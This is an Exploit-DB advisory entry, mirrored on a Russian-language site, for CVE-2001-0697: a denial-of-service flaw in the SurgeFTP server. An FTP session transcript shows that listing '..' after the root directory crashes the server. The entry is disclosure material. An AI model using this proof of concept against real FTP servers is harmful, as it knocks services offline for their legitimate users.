- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 20659
- Проверка EDB
-
- Пройдено
- Автор
- THE STRUMPF NOIR SOCIETY
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- cve-2001-0697
- Дата публикации
- 2001-03-01
Код:
source: https://www.securityfocus.com/bid/2442/info
SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms.
A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating.
Therefore, it is possible for a malicious user to deny service to legitimate users by passing the predescribed request to the ftp server.
# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
550 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer- Источник
- www.exploit-db.com
